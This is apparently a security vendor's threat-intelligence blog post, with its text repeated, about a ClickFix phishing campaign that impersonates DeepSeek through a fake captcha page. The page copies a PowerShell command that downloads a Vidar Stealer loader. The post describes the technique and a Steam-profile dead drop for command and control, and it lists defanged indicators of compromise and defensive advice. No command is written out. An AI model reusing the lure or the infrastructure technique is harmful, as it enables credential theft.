Threat Intelligence
5
mins read

DeepSeek ClickFix Scam Exposed! Protect Your Data Before It’s Too Late

Cybercriminals are exploiting DeepSeek’s rising popularity to launch ClickFix phishing campaigns, tricking users into clicking fake CAPTCHA links that steal credentials and install malware like Vidar and Lumma Stealer. These attacks impersonate DeepSeek’s branding to appear legitimate, bypass security measures, and infect unsuspecting victims. CloudSEK’s Threat Research Team has uncovered a malicious domain distributing malware via deceptive verification buttons. Learn how to spot these scams, secure your accounts with MFA, and avoid becoming the next victim! Stay informed and shield your data NOW before it’s too late! 🔥

Anshuman Das
February 10, 2025
Green Alert
Last Update posted on
February 10, 2025
Proactive Monitoring of the Dark Web for your organization.

Proactively monitor and defend your organization against threats from the dark web with CloudSEK XVigil.

Schedule a Demo
Table of Contents
Author(s)
No items found.

Executive Summary

Threat actors are exploiting the growing popularity of DeepSeek by launching phishing campaigns that use DeepSeek's brand name. These campaigns aim to steal credentials and distribute malware, including through fake investment schemes.

CloudSEK's Threat Research Team has discovered a domain used to spread Vidar Stealer malware through ClickFix phishing campaigns, a type of scam where victims are tricked into clicking on a malicious link that appears to be a captcha verification. These links often lead to the installation of malware, such as the Lumma Stealer mentioned in this report. A previous blog post, published in September of last year, explained this in detail.

Analysis and Attribution

Analysis of the Fake Domain

1. On 31 Jan 2025, CloudSEK’s contextual AI URL Analyser detected a domain with the name deepseekcaptcha[.]top The domain was hosted behind Cloudflare and was used to display a fake DeepSeek blogger theme offer.

The fake domain impersonating DeepSeek Brandname in ClickFix campaign

2. The WHOIS record shows that the domain was registered on January 31, 2025. The domain uses Cloudflare's hosting services to mask its true nature and evade detection from AI-based search engines, allowing it to remain undetected for an extended period.

3. While analyzing the functionality and flow of the phishing site, it became apparent that clicking the “Verificate” button on the malicious webpage’s landing page would copy a malicious PowerShell command, and once the instructions were followed, a malicious file download would begin.

The malicious fake captcha page downloads malware when the victim follows the steps

4. The highlighted command in the screenshot reveals that the file named 1.exe was downloaded and subsequently executed from the %TEMP% directory without any user interaction. Upon checking the IP address, 147.45.44[.]209 we found the Directory Listing reveals all the files and script in the campaigns used.

Other samples of Vidar malware along with downloader script and HTA file present on IP 147.45.44[.]209

4. Based on the primary static analysis of the downloaded file, 1.exe is classified to be the 1st stage downloader of Vidar Stealer which is used to infect devices and steal information.

5. Further analysis has revealed that the stealer has incorporated social media platforms, such as Telegram and Steam, into its infrastructure to provide updates and support, as well as command-and-control (C2) functionality. This includes embedding the IP address/URL on the profile page, which the malware retrieves during the initial stage of execution.

Steam profile used to download next stag sample from the IP present as the profile username

Recommendations

  • User Awareness and Education: The best defense against phishing attacks is a well-informed user base. Organizations and individuals should conduct regular security awareness training programs that educate users about the risks of phishing attacks and how to identify and avoid them. This includes:
    • Identifying Phishing Emails: Teach users to recognize the common signs of phishing emails, such as suspicious sender addresses, urgent requests for personal information, and links to unfamiliar websites.
    • Hover Before You Click: Encourage users to hover their mouse over links before clicking to verify the destination URL.
    • Verifying Website Authenticity: Advise users to check for the padlock symbol and "https://" in the address bar to ensure they are visiting a secure website.
    • Reporting Suspicious Activity: Establish a clear process for users to report suspicious emails or websites to the IT department.
  • Multi-Factor Authentication (MFA): Implementing MFA adds an extra layer of security by requiring users to provide multiple forms of verification before accessing sensitive accounts or systems. This can significantly reduce the risk of unauthorized access even if credentials are compromised.
  • Email Filtering and Anti-Phishing Solutions: Employ email filtering and anti-phishing solutions to detect and block malicious emails before they reach users' inboxes. These solutions can use a variety of techniques, such as signature-based detection, reputation analysis, and machine learning, to identify and quarantine phishing emails.
  • Network Segmentation: Segmenting the network can help to contain the spread of malware in the event of a successful phishing attack. By isolating critical systems and data from the rest of the network, organizations can limit the potential damage caused by a breach.
  • Incident Response Plan: Having a well-defined incident response plan in place can help organizations to respond quickly and effectively to phishing attacks. This plan should include procedures for identifying, containing, and eradicating the threat, as well as communicating with stakeholders.
  • Regular Software Updates: Keeping software and systems up to date with the latest security patches is crucial for mitigating vulnerabilities that can be exploited by threat actors.
  • Anti-Malware Software: Deploying anti-malware software on all endpoints can help to detect and remove malicious software that may be installed through phishing attacks.
  • Password Management: Encourage users to use strong, unique passwords for all of their accounts and to avoid reusing passwords across multiple sites. Consider implementing a password manager to help users manage their credentials securely.

By following these recommendations, organizations and individuals can significantly reduce their risk of falling victim to phishing attacks and protect themselves from the associated risks of data theft, financial loss, and reputational damage.

List of Indicator of Compromises

Following are the IOCs gathered from the campaign:

IOCs
1.exe (sha256:cd7bd1c6b651a700f059bc89168d6950292d77fb3703da401fdc83acae911aae)
din.exe (sha256:3defc89a9190f7ba4474aaa8fb3f5a738a721dc1999ac6f71d438cdeadb20e7)
lem.exe (sha256:cedb81c4665ea6e96d6bce5b08546fa776d37f2ed10fee4eb65d216ba90bd839)
test.hta (sha256:a3a5303a15cf016427104042c4968b9483abbb062af46fc138d4401078f2fe84)
script.ps1 (sha256:f2fbe8f49cf070c8672c64a75a732b4545f5055e96570e873866ef534ffbe8ec)
yoda.exe (sha256:b112123f490a0505d0c2722abc65d1285865c519ec9587fe72e988c38fc1fcbc)
147.45.44[.]209
95.217.25[.]45
hxxps://steamcommunity[.]com/profiles/76561199824159981 (Malicious URL)
deepseekcaptcha[.]top

References

Appendix

Workflow of a generic ClickFix Campaign to distribute malware - Vidar Malware in this case

Author

Anshuman Das

Threat Research @CloudSEK

Predict Cyber threats against your organization

Schedule a Demo
Related Posts
No items found.

Join 10,000+ subscribers

Keep up with the latest news about strains of Malware, Phishing Lures,
Indicators of Compromise, and Data Leaks.

Take action now

Secure your organisation with our Award winning Products

CloudSEK Platform is a no-code platform that powers our products with predictive threat analytic capabilities.

CloudSEK XVigil

Digital Risk Protection platform which gives Initial Attack Vector Protection for employees and customers.

Learn more about XVigil
CloudSEK SVigil

Software and Supply chain Monitoring providing Initial Attack Vector Protection for Software Supply Chain risks.

Learn more about SVigil
CloudSEK SVigil

Creates a blueprint of an organization's external attack surface including the core infrastructure and the software components.

Learn more about BeVigil Ent
CloudSEK BeVigil

Instant Security Score for any Android Mobile App on your phone. Search for any app to get an instant risk score.

Learn more about BeVigil
Threat Intelligence

5

min read

DeepSeek ClickFix Scam Exposed! Protect Your Data Before It’s Too Late

Cybercriminals are exploiting DeepSeek’s rising popularity to launch ClickFix phishing campaigns, tricking users into clicking fake CAPTCHA links that steal credentials and install malware like Vidar and Lumma Stealer. These attacks impersonate DeepSeek’s branding to appear legitimate, bypass security measures, and infect unsuspecting victims. CloudSEK’s Threat Research Team has uncovered a malicious domain distributing malware via deceptive verification buttons. Learn how to spot these scams, secure your accounts with MFA, and avoid becoming the next victim! Stay informed and shield your data NOW before it’s too late! 🔥

Authors
Anshuman Das
Threat Research @CloudSEK
Co-Authors
No items found.

Executive Summary

Threat actors are exploiting the growing popularity of DeepSeek by launching phishing campaigns that use DeepSeek's brand name. These campaigns aim to steal credentials and distribute malware, including through fake investment schemes.

CloudSEK's Threat Research Team has discovered a domain used to spread Vidar Stealer malware through ClickFix phishing campaigns, a type of scam where victims are tricked into clicking on a malicious link that appears to be a captcha verification. These links often lead to the installation of malware, such as the Lumma Stealer mentioned in this report. A previous blog post, published in September of last year, explained this in detail.

Analysis and Attribution

Analysis of the Fake Domain

1. On 31 Jan 2025, CloudSEK’s contextual AI URL Analyser detected a domain with the name deepseekcaptcha[.]top The domain was hosted behind Cloudflare and was used to display a fake DeepSeek blogger theme offer.

The fake domain impersonating DeepSeek Brandname in ClickFix campaign

2. The WHOIS record shows that the domain was registered on January 31, 2025. The domain uses Cloudflare's hosting services to mask its true nature and evade detection from AI-based search engines, allowing it to remain undetected for an extended period.

3. While analyzing the functionality and flow of the phishing site, it became apparent that clicking the “Verificate” button on the malicious webpage’s landing page would copy a malicious PowerShell command, and once the instructions were followed, a malicious file download would begin.

The malicious fake captcha page downloads malware when the victim follows the steps

4. The highlighted command in the screenshot reveals that the file named 1.exe was downloaded and subsequently executed from the %TEMP% directory without any user interaction. Upon checking the IP address, 147.45.44[.]209 we found the Directory Listing reveals all the files and script in the campaigns used.

Other samples of Vidar malware along with downloader script and HTA file present on IP 147.45.44[.]209

4. Based on the primary static analysis of the downloaded file, 1.exe is classified to be the 1st stage downloader of Vidar Stealer which is used to infect devices and steal information.

5. Further analysis has revealed that the stealer has incorporated social media platforms, such as Telegram and Steam, into its infrastructure to provide updates and support, as well as command-and-control (C2) functionality. This includes embedding the IP address/URL on the profile page, which the malware retrieves during the initial stage of execution.

Steam profile used to download next stag sample from the IP present as the profile username

Recommendations

  • User Awareness and Education: The best defense against phishing attacks is a well-informed user base. Organizations and individuals should conduct regular security awareness training programs that educate users about the risks of phishing attacks and how to identify and avoid them. This includes:
    • Identifying Phishing Emails: Teach users to recognize the common signs of phishing emails, such as suspicious sender addresses, urgent requests for personal information, and links to unfamiliar websites.
    • Hover Before You Click: Encourage users to hover their mouse over links before clicking to verify the destination URL.
    • Verifying Website Authenticity: Advise users to check for the padlock symbol and "https://" in the address bar to ensure they are visiting a secure website.
    • Reporting Suspicious Activity: Establish a clear process for users to report suspicious emails or websites to the IT department.
  • Multi-Factor Authentication (MFA): Implementing MFA adds an extra layer of security by requiring users to provide multiple forms of verification before accessing sensitive accounts or systems. This can significantly reduce the risk of unauthorized access even if credentials are compromised.
  • Email Filtering and Anti-Phishing Solutions: Employ email filtering and anti-phishing solutions to detect and block malicious emails before they reach users' inboxes. These solutions can use a variety of techniques, such as signature-based detection, reputation analysis, and machine learning, to identify and quarantine phishing emails.
  • Network Segmentation: Segmenting the network can help to contain the spread of malware in the event of a successful phishing attack. By isolating critical systems and data from the rest of the network, organizations can limit the potential damage caused by a breach.
  • Incident Response Plan: Having a well-defined incident response plan in place can help organizations to respond quickly and effectively to phishing attacks. This plan should include procedures for identifying, containing, and eradicating the threat, as well as communicating with stakeholders.
  • Regular Software Updates: Keeping software and systems up to date with the latest security patches is crucial for mitigating vulnerabilities that can be exploited by threat actors.
  • Anti-Malware Software: Deploying anti-malware software on all endpoints can help to detect and remove malicious software that may be installed through phishing attacks.
  • Password Management: Encourage users to use strong, unique passwords for all of their accounts and to avoid reusing passwords across multiple sites. Consider implementing a password manager to help users manage their credentials securely.

By following these recommendations, organizations and individuals can significantly reduce their risk of falling victim to phishing attacks and protect themselves from the associated risks of data theft, financial loss, and reputational damage.

List of Indicator of Compromises

Following are the IOCs gathered from the campaign:

IOCs
1.exe (sha256:cd7bd1c6b651a700f059bc89168d6950292d77fb3703da401fdc83acae911aae)
din.exe (sha256:3defc89a9190f7ba4474aaa8fb3f5a738a721dc1999ac6f71d438cdeadb20e7)
lem.exe (sha256:cedb81c4665ea6e96d6bce5b08546fa776d37f2ed10fee4eb65d216ba90bd839)
test.hta (sha256:a3a5303a15cf016427104042c4968b9483abbb062af46fc138d4401078f2fe84)
script.ps1 (sha256:f2fbe8f49cf070c8672c64a75a732b4545f5055e96570e873866ef534ffbe8ec)
yoda.exe (sha256:b112123f490a0505d0c2722abc65d1285865c519ec9587fe72e988c38fc1fcbc)
147.45.44[.]209
95.217.25[.]45
hxxps://steamcommunity[.]com/profiles/76561199824159981 (Malicious URL)
deepseekcaptcha[.]top

References

Appendix

Workflow of a generic ClickFix Campaign to distribute malware - Vidar Malware in this case